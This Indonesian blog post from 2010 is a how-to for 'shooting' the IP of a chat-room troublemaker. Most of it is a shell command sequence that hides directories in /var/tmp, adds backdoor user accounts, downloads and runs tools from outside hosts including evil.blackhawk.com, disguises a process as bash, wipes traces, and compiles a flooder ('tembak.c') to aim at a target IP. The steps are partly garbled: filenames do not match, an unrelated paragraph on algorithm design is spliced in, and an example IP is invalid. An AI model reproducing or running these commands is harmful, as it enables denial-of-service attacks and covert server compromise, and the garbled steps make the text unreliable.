PageRank Checker

Laman

Quote

Quote

Dilarang mengcopy isi dari semua blog ini atau menyalahgunakan isi dari blog ini. Diberdayakan oleh Blogger.

Popular Posts

Quote

Search

Memuat...

Total Tayangan Laman

Loading...

Random Post

Recent Posts

BlogRoll

Menghajar IP ( Tembak Target IP )

Share artikel ke: Facebook Twitter Google+ Linkedin Technorati Digg

Awalnya biasa saja ..cie...leah kok jadi lagu tow,Ok sobat pada posting yang jarang jarang nich karena sibuk di underground yang kejar tayang jadi ngga sesering dulu postingnya tapi ngga akan mengurangi kapasitas atau kualitas dari posting yang lain kok.Ini sebenarnya sudah lama aku mau postingkan tapi karena beberapa pertimbangan karena dilihat dari sisi positifnya cuman 0,5% doang selebihnya fatal banget buat kenyamanan para sahabat terutama kaum chatters.Ok dech biar ngga pada bingung para sahabat aq kasih sedikit kilas balik,ada seorang sahabat yang jengah akan kondisi roomnya yang terus terusan di serang RD (Room Destroyer) yang mengganggu aktivitas dari para chatters buat enjoy in the room.Apa beda dengan Destroy Room? Destroy Room sebenarnya hanyalah mengobrak abrik atau membuat Chat Room menjadi sangat tidak nyaman untuk digunakan Chatting lagi. Destroy Room akan mengakibatkan sejumlah ID boot “berbicara” secara terus menerus di chat room sehingga orang lain seakan-akan tidak memiliki kesempatan untuk ngobrol di dalamnya. Bisa juga untuk mengcopi semua pembicaraan yang ada di chat room dan kemudian dipastekan kembali ke chat room. Hal ini sebenarnya seperti PM boot yang menyerang kita. Namun serangan yang dilakukan bukan pada ID yahoo namun pada Room, ironisnya bila yang diserang itu cuman Yahoo Massenger biasa oooooo.........kita akan terbiasa dengan room yang penuh dengan korban korban RD jadi IDnya nyangkut ngga isa balik saat dilog out.Terus gimana cara ngatasinya RD atau booters nyebelin itu????Tembak Saja IP nya Beres,gimana Caranya??

Sebelum kita beranjak ada baiknya sedikit piss kasih tau dari sisi awal biar pada ngerti ya, Shell, dalam komputer adalah salah satu jenis program bawaan sistem operasi (seringnya merupakan program yang terpisah dari inti sistem operasi) yang menyediakan komunikasi langsung antara pengguna dan sistem operasi. Contoh dari shell adalah COMMAND.COM dalam MS-DOS, Macintosh Finder (Macintosh), Windows Explorer, Command Prompt/cmd.exe, PowerShell dalam Microsoft Windows, Bourne shell, C shell, Korn shell dan masih banyak lainnya khususnya dalam keluarga sistem operasi UNIX. Beberapa shell juga dapat digunakan untuk melakukan manajemen berkas.
Desain dan analisis algoritma adalah suatu cabang khusus dalam ilmu komputer yang mempelajari karakteristik dan performa dari suatu algoritma dalam menyelesaikan masalah, terlepas dari implementasi algoritma tersebut. Dalam cabang disiplin ini algoritma dipelajari secara abstrak, terlepas dari sistem komputer atau bahasa pemrograman yang digunakan. Algoritma yang berbeda dapat diterapkan pada suatu masalah dengan kriteria yang sama.Ok kalau dah pada ngerti selanjutnya silahkan ikuti langkah langkah ini :
Tentukan dulu target yang akan kita habisin.contoh IP target 165.332.66.20 1945
# Pertama Login dulllu ke shell kamu Lalu Ketikkan Perintah dibawah ini :

gcc

w

cd /var/tmp/

ls -al

mkdir " "
wget http://www.geocities.com/darksite_jyinx/oidentd-1.9.9.1.tar.gz

tar zxvf oidentd-1.9.9.1.tar.gz

cd oidentd-1.9.9.1/

./configure

make

make install

cd ..

ls -al

rm -rf " "

mkdir "..."

ls -al

cd ...

adduser valid

passwd valid

wget evil.blackhawk.com/zotob.tar.gz

tar -zxvf blownduck.tar.gz

cd blownduck

./kik 'bash -i' ./bash

pico psybnc.conf

cd ..

ls -al

rm -rf
blownduck

rm -rf
blownduck.tar.gz

cd ..

adduser fukc

passwd
fukc

cd /var/tmp/

ls -al

cd ...

wget http://www.geocities.com/
darksite_jyinx/tembak.c

gcc -o tembak tembak.c

./tembak

./tembak 64.250.66.44 1945


/* Cara alternatif lainnya lihat perintah perintah di bawah ini:


cd /var/tmp/

ls -al

cd ...

wget http://www.geocities.com/finalheaven_ardi/tembak.c


gcc -o tembak tembak.c

./tembak

./tembak XXX.XXX.XX.X 1945 <-------- ./tembak XXX.XXX.XX.X IP sasaran kita Hingga muncul tulisan Pasukan........ DDDuuuuuuuAAAAARRRRrrrrrr...!!! Ok sobat tinggal sahabat besok tunggu kabar aja dech sapa yang suka usil ntar ketahuan ngga isa OL lagi hiks hiks......Semoga bermanfaat
Anda baru saja membaca artikel yang berkategori dengan judul Menghajar IP ( Tembak Target IP ). Anda bisa bookmark halaman ini dengan URL http://cjmankeren.blogspot.com/2010/07/awalnya-biasa-saja.html. Terima kasih!
Ditulis oleh: Jerry - Minggu, 25 Juli 2010
Comments
0 Comments

Belum ada komentar untuk "Menghajar IP ( Tembak Target IP )"

Poskan Komentar